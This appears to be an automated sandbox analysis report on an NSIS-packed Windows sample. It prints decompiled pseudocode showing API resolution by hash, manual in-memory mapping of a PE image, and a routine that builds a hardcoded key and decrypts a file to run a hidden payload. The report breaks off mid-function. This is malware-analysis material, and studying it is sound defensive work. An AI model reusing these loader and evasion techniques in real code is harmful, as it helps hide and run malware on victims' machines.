                                                                                                                          				_v68 = E703C4652(_v20, 0x170c1ca1);
                                                                                                                          				_v52 = E703C4652(_v20, 0xa5f15738);
                                                                                                                          				_v72 = E703C4652(_v20, 0x433a3842);
                                                                                                                          				_v56 = E703C4652(_v20, 0xd6eb2188);
                                                                                                                          				_v60 = E703C4652(_v20, 0x50a26af);
                                                                                                                          				_v80 = E703C4652(_v20, 0x55e38b1f);
                                                                                                                          				_v44 = 1;
                                                                                                                          				while(1) {
                                                                                                                          					_v16 = CreateFileW(E703C47AD(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                                                          					if(_v16 == 0xffffffff) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_v36 = _v68(_v16, 0);
                                                                                                                          					__eflags = _v36 - 0xffffffff;
                                                                                                                          					if(_v36 != 0xffffffff) {
                                                                                                                          						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                                                                                          						__eflags = _v12;
                                                                                                                          						if(_v12 != 0) {
                                                                                                                          							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                                                                                          							__eflags = _t165;
                                                                                                                          							if(_t165 != 0) {
                                                                                                                          								_v76 = _v12;
                                                                                                                          								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
                                                                                                                          								_t213 = _v32;
                                                                                                                          								_v40 = _v32 + ( *(_v32 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                          								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                                                                                          								__eflags = _v24;
                                                                                                                          								if(_v24 != 0) {
                                                                                                                          									E703C45C2(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                                                                                          									_v28 = _v28 & 0x00000000;
                                                                                                                          									while(1) {
                                                                                                                          										_t175 = _v32;
                                                                                                                          										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                                                                                          										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										E703C45C2(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
                                                                                                                          										_t210 = _v28 + 1;
                                                                                                                          										__eflags = _t210;
                                                                                                                          										_v28 = _t210;
                                                                                                                          									}
                                                                                                                          									_v48 = E703C4652(_v24, _a4);
                                                                                                                          									__eflags = _v48;
                                                                                                                          									if(_v48 != 0) {
                                                                                                                          										__eflags = _v16;
                                                                                                                          										if(_v16 != 0) {
                                                                                                                          											FindCloseChangeNotification(_v16);
                                                                                                                          										}
                                                                                                                          										__eflags = _v12;
                                                                                                                          										if(_v12 != 0) {
                                                                                                                          											VirtualFree(_v12, 0, 0x8000);
                                                                                                                          										}
                                                                                                                          										_v44 = _v44 & 0x00000000;
                                                                                                                          										__eflags = 0;
                                                                                                                          										if(0 != 0) {
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          					}
                                                                                                                          					L22:
                                                                                                                          					if(_v44 != 0) {
                                                                                                                          						if(_v16 != 0) {
                                                                                                                          							_v56(_v16);
                                                                                                                          						}
                                                                                                                          						_v80(0);
                                                                                                                          					}
                                                                                                                          					_v8 = _v48;
                                                                                                                          					while(1 != 0) {
                                                                                                                          						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                                                                                          							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                                                                                          							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                                                                                          								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                                                                                          								if(( *_v8 & 0x000000ff) != 0xea) {
                                                                                                                          									_t195 = _v8 + 1;
                                                                                                                          									__eflags = _t195;
                                                                                                                          									_v8 = _t195;
                                                                                                                          								} else {
                                                                                                                          									_v8 =  *(_v8 + 1);
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                                                                                          								_v8 = _v8 + _t125;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          						}
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_v8 = _v8 + 1;
                                                                                                                          					_v84 =  *_v8;
                                                                                                                          					if(_v24 != 0) {
                                                                                                                          						VirtualFree(_v24, 0, 0x8000);
                                                                                                                          					}
                                                                                                                          					return _v84;
                                                                                                                          				}
                                                                                                                          				goto L22;
                                                                                                                          			}

                                                                                                                          0x703c3966
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x703c393f
                                                                                                                          0x00000000
                                                                                                                          0x703c38cc
                                                                                                                          0x00000000
                                                                                                                          0x703c3889
                                                                                                                          0x00000000
                                                                                                                          0x703c386e
                                                                                                                          0x00000000
                                                                                                                          0x703c3851
                                                                                                                          0x703c396c
                                                                                                                          0x703c3970
                                                                                                                          0x703c3976
                                                                                                                          0x703c397b
                                                                                                                          0x703c397b
                                                                                                                          0x703c3980
                                                                                                                          0x703c3980
                                                                                                                          0x703c3986
                                                                                                                          0x703c3989
                                                                                                                          0x703c3999
                                                                                                                          0x703c39a3
                                                                                                                          0x703c39a8
                                                                                                                          0x703c39c2
                                                                                                                          0x703c39c7
                                                                                                                          0x703c39d7
                                                                                                                          0x703c39d7
                                                                                                                          0x703c39d8
                                                                                                                          0x703c39c9
                                                                                                                          0x703c39cf
                                                                                                                          0x703c39cf
                                                                                                                          0x703c39aa
                                                                                                                          0x703c39b3
                                                                                                                          0x703c39b7
                                                                                                                          0x703c39b7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x703c399b
                                                                                                                          0x00000000
                                                                                                                          0x703c3999
                                                                                                                          0x703c39e1
                                                                                                                          0x703c39e9
                                                                                                                          0x703c39f0
                                                                                                                          0x703c39fc
                                                                                                                          0x703c39fc
                                                                                                                          0x703c3a05
                                                                                                                          0x703c3a05
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,55E38B1F,?,050A26AF,?,D6EB2188,?,433A3842), ref: 703C382F
                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 703C39FC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                                          • String ID: =4<p
                                                                                                                          • API String ID: 204039940-596753135
                                                                                                                          • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                                                          • Instruction ID: 81040a1c5b9ec0b1f69f544e734d2d3e4678380bd83af8e7c43dcdbe024a17bd
                                                                                                                          • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                                                          • Instruction Fuzzy Hash: 31A1D234E00209EFDB01DBE4C985BAEBBB6BF08311F20445AE515FA2A0D7B99E51DF15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t43;
                                                                                                                          				FILETIME* _t49;
                                                                                                                          				FILETIME* _t62;
                                                                                                                          				void* _t64;
                                                                                                                          				signed int _t70;
                                                                                                                          				FILETIME* _t71;
                                                                                                                          				FILETIME* _t75;
                                                                                                                          				signed int _t77;
                                                                                                                          				void* _t80;
                                                                                                                          				CHAR* _t82;
                                                                                                                          				void* _t85;
                                                                                                                          
                                                                                                                          				_t75 = __ebx;
                                                                                                                          				_t82 = E00402BCE(0x31);
                                                                                                                          				 *(_t85 - 8) = _t82;
                                                                                                                          				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                                                          				_t33 = E00405C52(_t82);
                                                                                                                          				_push(_t82);
                                                                                                                          				if(_t33 == 0) {
                                                                                                                          					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                                                                          				} else {
                                                                                                                          					_push(0x40a450);
                                                                                                                          					E0040624D();
                                                                                                                          				}
                                                                                                                          				E00406528(0x40a450);
                                                                                                                          				while(1) {
                                                                                                                          					__eflags =  *(_t85 + 8) - 3;
                                                                                                                          					if( *(_t85 + 8) >= 3) {
                                                                                                                          						_t64 = E004065C1(0x40a450);
                                                                                                                          						_t77 = 0;
                                                                                                                          						__eflags = _t64 - _t75;
                                                                                                                          						if(_t64 != _t75) {
                                                                                                                          							_t71 = _t64 + 0x14;
                                                                                                                          							__eflags = _t71;
                                                                                                                          							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                                                          						}
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                          						__eflags = _t70;
                                                                                                                          						 *(_t85 + 8) = _t70;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                          					if( *(_t85 + 8) == _t75) {
                                                                                                                          						E00405DC1(0x40a450);
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t85 + 8) - 1;
                                                                                                                          					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                          					__eflags = _t41 - 0xffffffff;
                                                                                                                          					 *(_t85 - 0xc) = _t41;
                                                                                                                          					if(_t41 != 0xffffffff) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                          					if( *(_t85 + 8) != _t75) {
                                                                                                                          						E00405374(0xffffffe2,  *(_t85 - 8));
                                                                                                                          						__eflags =  *(_t85 + 8) - 2;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                          						}
                                                                                                                          						L31:
                                                                                                                          						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                          						__eflags =  *0x42f4e8;
                                                                                                                          						goto L32;
                                                                                                                          					} else {
                                                                                                                          						E0040624D(0x40ac50, 0x430000);
                                                                                                                          						E0040624D(0x430000, 0x40a450);
                                                                                                                          						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\hardz\AppData\Local\Temp\nsr575.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                                                          						E0040624D(0x430000, 0x40ac50);
                                                                                                                          						_t62 = E00405969("C:\Users\hardz\AppData\Local\Temp\nsr575.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                                                          						__eflags = _t62;
                                                                                                                          						if(_t62 == 0) {
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t62 == 1;
                                                                                                                          							if(_t62 == 1) {
                                                                                                                          								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
                                                                                                                          								L32:
                                                                                                                          								_t49 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          							} else {
                                                                                                                          								_push(0x40a450);
                                                                                                                          								_push(0xfffffffa);
                                                                                                                          								E00405374();
                                                                                                                          								L29:
                                                                                                                          								_t49 = 0x7fffffff;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L33:
                                                                                                                          					return _t49;
                                                                                                                          				}
                                                                                                                          				E00405374(0xffffffea,  *(_t85 - 8));
                                                                                                                          				 *0x42f514 =  *0x42f514 + 1;
                                                                                                                          				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                                                                                          				 *0x42f514 =  *0x42f514 - 1;
                                                                                                                          				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                                                          				_t80 = _t43;
                                                                                                                          				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                                                          					L22:
                                                                                                                          					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                                                          				} else {
                                                                                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                                                          					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                                                                          				__eflags = _t80 - _t75;
                                                                                                                          				if(_t80 >= _t75) {
                                                                                                                          					goto L31;
                                                                                                                          				} else {
                                                                                                                          					__eflags = _t80 - 0xfffffffe;
                                                                                                                          					if(_t80 != 0xfffffffe) {
                                                                                                                          						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
                                                                                                                          					} else {
                                                                                                                          						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
                                                                                                                          						lstrcatA(0x40a450,  *(_t85 - 8));
                                                                                                                          					}
                                                                                                                          					_push(0x200010);
                                                                                                                          					_push(0x40a450);
                                                                                                                          					E00405969();
                                                                                                                          					goto L29;
                                                                                                                          				}
                                                                                                                          				goto L33;
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                                                            • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll$Call
                                                                                                                          • API String ID: 1941528284-4223674282
                                                                                                                          • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                                                          • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                                                          • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                                                          • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040583A(CHAR* _a4) {
                                                                                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                          				int _t22;
                                                                                                                          				long _t23;
                                                                                                                          
                                                                                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                          				_v36.Owner = 0x408384;
                                                                                                                          				_v36.Group = 0x408384;
                                                                                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                          				_v36.Revision = 1;
                                                                                                                          				_v36.Control = 4;
                                                                                                                          				_v36.Dacl = 0x408374;
                                                                                                                          				_v16.nLength = 0xc;
                                                                                                                          				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                                                          				if(_t22 != 0) {
                                                                                                                          					L1:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t23 = GetLastError();
                                                                                                                          				if(_t23 == 0xb7) {
                                                                                                                          					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				return _t23;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                                                          • GetLastError.KERNEL32 ref: 00405891
                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                                                          • GetLastError.KERNEL32 ref: 004058B0
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                                                          • C:\Users\user\Desktop, xrefs: 0040583A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                          • API String ID: 3449924974-3254906087
                                                                                                                          • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                          • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                                                          • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                          • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004065E8(intOrPtr _a4) {
                                                                                                                          				char _v292;
                                                                                                                          				int _t10;
                                                                                                                          				struct HINSTANCE__* _t14;
                                                                                                                          				void* _t16;
                                                                                                                          				void* _t21;
                                                                                                                          
                                                                                                                          				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                                                          				if(_t10 > 0x104) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				}
                                                                                                                          				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                                                          					_t16 = 1;
                                                                                                                          				} else {
                                                                                                                          					_t16 = 0;
                                                                                                                          				}
                                                                                                                          				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                                                          				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                                                          				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                                                          				return _t14;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                                                                          • wsprintfA.USER32 ref: 00406638
                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                                                                          • API String ID: 2200240437-4240819195
                                                                                                                          • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                          • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                                                          • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                          • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E703C42E6(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v25;
                                                                                                                          				char _v26;
                                                                                                                          				char _v27;
                                                                                                                          				char _v28;
                                                                                                                          				char _v29;
                                                                                                                          				char _v30;
                                                                                                                          				char _v31;
                                                                                                                          				char _v32;
                                                                                                                          				char _v33;
                                                                                                                          				char _v34;
                                                                                                                          				char _v35;
                                                                                                                          				char _v36;
                                                                                                                          				char _v37;
                                                                                                                          				char _v38;
                                                                                                                          				char _v39;
                                                                                                                          				char _v40;
                                                                                                                          				char _v41;
                                                                                                                          				char _v42;
                                                                                                                          				char _v43;
                                                                                                                          				char _v44;
                                                                                                                          				char _v45;
                                                                                                                          				char _v46;
                                                                                                                          				char _v47;
                                                                                                                          				char _v48;
                                                                                                                          				char _v49;
                                                                                                                          				char _v50;
                                                                                                                          				char _v51;
                                                                                                                          				char _v52;
                                                                                                                          				char _v53;
                                                                                                                          				char _v54;
                                                                                                                          				char _v55;
                                                                                                                          				char _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				intOrPtr _v72;
                                                                                                                          				intOrPtr _v76;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				long _v84;
                                                                                                                          				intOrPtr _v88;
                                                                                                                          				intOrPtr _v92;
                                                                                                                          				intOrPtr _v96;
                                                                                                                          				intOrPtr _v100;
                                                                                                                          				intOrPtr _v104;
                                                                                                                          				intOrPtr _v108;
                                                                                                                          				intOrPtr _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				intOrPtr _v120;
                                                                                                                          				intOrPtr _v124;
                                                                                                                          				char _v140;
                                                                                                                          				char _v208;
                                                                                                                          				char _v1248;
                                                                                                                          				signed int _t124;
                                                                                                                          				void* _t126;
                                                                                                                          				void* _t130;
                                                                                                                          				signed int _t131;
                                                                                                                          				void* _t132;
                                                                                                                          				int _t134;
                                                                                                                          				int _t137;
                                                                                                                          				signed int _t147;
                                                                                                                          				void* _t149;
                                                                                                                          				signed int _t150;
                                                                                                                          				void* _t152;
                                                                                                                          				signed int _t153;
                                                                                                                          				void* _t155;
                                                                                                                          				void* _t156;
                                                                                                                          				void* _t157;
                                                                                                                          				void* _t158;
                                                                                                                          				void* _t159;
                                                                                                                          
                                                                                                                          				_t159 = __eflags;
                                                                                                                          				_t157 = __edx;
                                                                                                                          				_t156 = __ecx;
                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                          				_v84 = _v84 & 0x00000000;
                                                                                                                          				_v56 = 0x32;
                                                                                                                          				_v55 = 0x31;
                                                                                                                          				_v54 = 0x63;
                                                                                                                          				_v53 = 0x32;
                                                                                                                          				_v52 = 0x61;
                                                                                                                          				_v51 = 0x65;
                                                                                                                          				_v50 = 0x31;
                                                                                                                          				_v49 = 0x63;
                                                                                                                          				_v48 = 0x33;
                                                                                                                          				_v47 = 0x62;
                                                                                                                          				_v46 = 0x33;
                                                                                                                          				_v45 = 0x30;
                                                                                                                          				_v44 = 0x34;
                                                                                                                          				_v43 = 0x63;
                                                                                                                          				_v42 = 0x63;
                                                                                                                          				_v41 = 0x61;
                                                                                                                          				_v40 = 0x38;
                                                                                                                          				_v39 = 0x66;
                                                                                                                          				_v38 = 0x37;
                                                                                                                          				_v37 = 0x31;
                                                                                                                          				_v36 = 0x62;
                                                                                                                          				_v35 = 0x30;
                                                                                                                          				_v34 = 0x37;
                                                                                                                          				_v33 = 0x65;
                                                                                                                          				_v32 = 0x66;
                                                                                                                          				_v31 = 0x36;
                                                                                                                          				_v30 = 0x62;
                                                                                                                          				_v29 = 0x38;
                                                                                                                          				_v28 = 0x36;
                                                                                                                          				_v27 = 0x35;
                                                                                                                          				_v26 = 0x39;
                                                                                                                          				_v25 = 0x37;
                                                                                                                          				_v24 = 0;
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_v116 = _v116 & 0x00000000;
                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                          				_v8 = E703C45AA();
                                                                                                                          				_v60 = E703C4652(_v8, 0x34cf0bf);
                                                                                                                          				_v64 = E703C4652(_v8, 0x55e38b1f);
                                                                                                                          				_v68 = E703C4652(_v8, 0xd1775dc4);
                                                                                                                          				_v120 = E703C4652(_v8, 0xd6eb2188);
                                                                                                                          				_v96 = E703C4652(_v8, 0xa2eae210);
                                                                                                                          				_v124 = E703C4652(_v8, 0xcd8538b2);
                                                                                                                          				_v72 = E703C4652(_v8, 0x8a111d91);
                                                                                                                          				_v76 = E703C4652(_v8, 0x170c1ca1);
                                                                                                                          				_v80 = E703C4652(_v8, 0xa5f15738);
                                                                                                                          				_v88 = E703C4652(_v8, 0x433a3842);
                                                                                                                          				_v92 = E703C4652(_v8, 0x2ffe2c64);
                                                                                                                          				_v112 = 0x2d734193;
                                                                                                                          				_v108 = 0x63daa681;
                                                                                                                          				_v104 = 0x26090612;
                                                                                                                          				_v100 = 0x6f28fae0;
                                                                                                                          				_t124 = 4;
                                                                                                                          				_t126 = E703C4243(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
                                                                                                                          				_t160 = _t126;
                                                                                                                          				if(_t126 != 0) {
                                                                                                                          					L4:
                                                                                                                          					_v60(0x7918);
                                                                                                                          					L5:
                                                                                                                          					_v68(0,  &_v1248, 0x103);
                                                                                                                          					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                                                          					_v20 = _t130;
                                                                                                                          					if(_v20 != 0xffffffff) {
                                                                                                                          						_t131 = _v76(_v20, 0);
                                                                                                                          						_v16 = _t131;
                                                                                                                          						__eflags = _v16 - 0xffffffff;
                                                                                                                          						if(_v16 != 0xffffffff) {
                                                                                                                          							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
                                                                                                                          							_v12 = _t132;
                                                                                                                          							__eflags = _v12;
                                                                                                                          							if(_v12 != 0) {
                                                                                                                          								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
                                                                                                                          								__eflags = _t134;
                                                                                                                          								if(_t134 != 0) {
                                                                                                                          									_t99 =  &_v56; // 0x32
                                                                                                                          									E703C4047(_v12, _t99, 0x20);
                                                                                                                          									_t137 = E703C3034(_t156, _t157, __eflags, _v12); // executed
                                                                                                                          									__eflags = _t137;
                                                                                                                          									if(_t137 != 0) {
